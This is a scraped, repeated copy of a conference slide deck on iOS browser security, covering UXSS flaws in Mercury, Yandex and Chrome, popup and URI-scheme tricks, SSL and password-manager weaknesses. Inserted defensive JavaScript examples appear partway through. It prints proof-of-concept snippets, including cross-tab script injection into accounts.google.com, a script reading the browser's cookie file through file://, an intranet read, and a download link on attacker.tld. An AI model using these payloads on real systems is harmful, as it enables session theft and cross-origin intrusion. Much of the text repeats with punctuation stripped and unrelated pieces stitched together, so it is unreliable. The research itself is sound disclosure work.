UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 37: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/37.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
[webView loadRequest: … "about:blank" …]
cross-frame forgery

CVE-2013-6893: Mercury UXSS
w.document.write('Hi')
mb.exec$(WINDOW_ID)[{ "command": "window.document.write", target: 1234, "html": "Hi" }]
[webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]

CVE-2013-6893: Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>'); …and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser

CVE-2013-7197: Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() -> UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899: Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]

CVE-2012-2899: Chrome UXSS
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]

CVE-2012-2899: Chrome UXSS
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and local files.

CVE-2012-2899: Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
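The three UXSS cases above are each one missing check in the bridge that carries cross-tab commands from JavaScript to native code. As an added example that is not part of the talk and not code from any of the browsers it names, here is a JavaScript model of such a handler (the Tab and Bridge classes and the command names are constructed for this example) that performs all three checks on every call: the target window must be one the caller opened, origins are re-derived from the current URL at write time, and non-web origins such as applewebdata:// or file:// never match anything.

```javascript
'use strict';
// Added example, not code from the talk or from any browser it names.
// Model of a UIWebView-based browser's JavaScript-to-native bridge, showing
// the checks a cross-tab command handler needs. Tab, Bridge and the command
// names are constructed for this example.

// Web origin of a URL, or null for anything that must never be treated as one
// (file://, applewebdata://, custom app schemes, unparsable strings).
function webOrigin(url) {
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.origin;
}

class Tab {
  constructor(id, url, origin) {
    this.id = id;
    this.url = url;
    this.origin = origin;   // recomputed on every navigation, see Bridge.navigate
    this.writes = [];       // HTML written into this tab by bridge commands
  }
}

class Bridge {
  constructor() {
    this.tabs = new Map();    // window id -> Tab
    this.openers = new Map(); // child window id -> opener window id
    this.nextId = 1;
  }

  // Tab created by the user (address bar, bookmark): origin follows its URL.
  createTab(url) {
    const tab = new Tab(this.nextId++, url, webOrigin(url));
    this.tabs.set(tab.id, tab);
    return tab;
  }

  // Any navigation replaces the origin. The Yandex bug was an origin fixed at
  // window.open() time and never re-derived afterwards.
  navigate(windowId, url) {
    const tab = this.tabs.get(windowId);
    if (!tab) return false;
    tab.url = url;
    tab.origin = webOrigin(url);
    return true;
  }

  // Bridge command "window.open" issued from window callerId.
  open(callerId, url) {
    const caller = this.tabs.get(callerId);
    if (!caller) return null;
    // about:blank inherits the opener's origin. The Chrome bug was loading it
    // with baseURL:nil, which gave it applewebdata:// and no SOP at all.
    const origin = url === 'about:blank' ? caller.origin : webOrigin(url);
    const child = new Tab(this.nextId++, url, origin);
    this.tabs.set(child.id, child);
    this.openers.set(child.id, callerId);
    return child.id;
  }

  // Bridge command "window.document.write" on window targetId from callerId.
  write(callerId, targetId, html) {
    const caller = this.tabs.get(callerId);
    const target = this.tabs.get(targetId);
    if (!caller || !target) return false;
    // Mercury bug: any WINDOW_ID was accepted, so a guessed id reached any tab.
    if (this.openers.get(targetId) !== callerId) return false;
    // Opaque/non-web origins never match, not even each other.
    if (caller.origin === null || target.origin === null) return false;
    // Same-origin check repeated at write time, using the current origins.
    if (caller.origin !== target.origin) return false;
    target.writes.push(html);
    return true;
  }
}
```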
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other, filename .html
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
}
</script>

JS without Same-Origin-Policy
<script> x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText); </script>

Challenge: Hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false
In this presentation
• iOS Browsers: UIWebView & WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
Application (bolted-on) vs. Native (WebKit); Bridge (internal) vs. Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example: Opera Coast <script>document.location = 'http://%5c'</script>

Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
In this presentation
• iOS Browsers: UIWebView & WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with the privileges of the top frame -> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
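As an added example, not from the talk and not any browser's own code: a JavaScript model of a save/fill policy for a browser app's built-in password manager (the PasswordStore API and the submission and frame records are constructed here) that avoids the weaknesses listed above by keying credentials on the full origin, scheme included, by filing a saved password under the origin of the document that contained the form rather than anything the page chose, and by refusing to fill anything but the top frame.

```javascript
'use strict';
// Added example, not code from the talk or from any browser it names.
// Save/fill policy for a browser app's built-in password manager. The
// PasswordStore API and the submission/frame records are constructed here.

// Web origin (scheme + host + port) of a URL, or null for non-web URLs.
function webOrigin(url) {
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.origin;
}

class PasswordStore {
  constructor() {
    this.byOrigin = new Map(); // origin -> { username, password }
  }

  // Accept a credential only from a form the user submitted in a top-level
  // document, and file it under the origin of that document. A third-party
  // page therefore cannot pick the origin by pointing its form's action at
  // another site, and nothing is saved without a user gesture.
  save(submission) {
    const origin = webOrigin(submission.documentUrl);
    if (origin === null) return false;
    if (!submission.isTopFrame || !submission.userGesture) return false;
    this.byOrigin.set(origin, {
      username: submission.username,
      password: submission.password,
    });
    return true;
  }

  // Credential to fill into a frame, or null. Only the top frame is filled
  // (the fill script runs with top-frame privileges anyway), and the match is
  // on the full origin, so http://bank.example never receives the credential
  // saved for https://bank.example.
  credentialFor(frame) {
    if (!frame.isTopFrame) return null;
    const origin = webOrigin(frame.url);
    if (origin === null) return null;
    return this.byOrigin.get(origin) || null;
  }
}
```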
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you!
![Page 38: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/38.jpg)
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 39: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/39.jpg)
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
